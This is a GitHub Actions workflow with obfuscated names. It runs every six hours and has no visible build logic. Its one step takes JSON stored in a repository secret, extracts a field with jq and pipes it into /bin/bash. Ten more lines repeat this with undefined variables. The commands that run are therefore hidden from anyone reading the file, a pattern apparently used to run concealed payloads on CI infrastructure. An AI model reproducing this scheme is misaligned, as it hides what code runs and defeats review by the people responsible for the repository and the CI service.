name: meilitong3214

on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meilitong3214
        env:
          crq9: ${{ secrets.crq9 }}
        run: |
          echo $crq9 | jq -r .ze410 | /bin/bash
          echo $n18 | jq -r .qc591 | /bin/bash
          echo $lj80688 | jq -r .y67062 | /bin/bash
          echo $eqd675 | jq -r .lfvbx761 | /bin/bash
          echo $rghn919 | jq -r .afjl7 | /bin/bash
          echo $vrigr939 | jq -r .j790 | /bin/bash
          echo $am4 | jq -r .tpzot14 | /bin/bash
          echo $r120 | jq -r .h68615 | /bin/bash
          echo $a31614 | jq -r .pwpxr0327 | /bin/bash
          echo $hmfop1230 | jq -r .knle6 | /bin/bash
          echo $x9 | jq -r .ahnh7806 | /bin/bash

